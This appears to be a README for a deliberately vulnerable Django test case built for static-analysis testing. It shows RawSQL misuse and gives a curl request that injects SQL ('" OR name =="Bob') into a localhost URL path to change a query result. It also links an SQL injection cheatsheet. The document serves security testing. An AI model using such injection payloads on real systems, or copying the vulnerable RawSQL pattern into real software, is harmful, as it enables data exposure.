
# SAST Vulnerable Minimal Runnable Example(MRE)

## Background Information

This MRE portrays the realisitc but improper usage of [Django RawSQL expressions and annotations](https://docs.djangoproject.com/en/3.0/ref/models/expressions/#raw-sql-expressions).

### References

- [Django SQL injection via headers](https://docs.fluidattacks.com/criteria/fixes/python/155)
- [Django working with forms](https://docs.djangoproject.com/en/5.0/topics/forms/)
- [Advanced SQL injection cheatsheet](https://github.com/kleiton0x00/Advanced-SQL-Injection-Cheatsheet/tree/main) 


## Running

```
docker compose build 

docker compose up 
```

## Normal Execution

```
$ curl -s 'http://localhost:8000/myapp/testcase01_vulnerable/2//myapp/' | grep -A2 not_contained_count
        <th scope="row">not_contained_count</th>
        <td>0</td>
      </tr>
```


## Exploitation 


```
$ curl -s 'http://localhost:8000/myapp/testcase01_vulnerable/2//myapp/"%20OR%20name%20=="Bob' | grep -A2 not_contained_count
        <th scope="row">not_contained_count</th>
        <td>1</td>
      </tr>
```
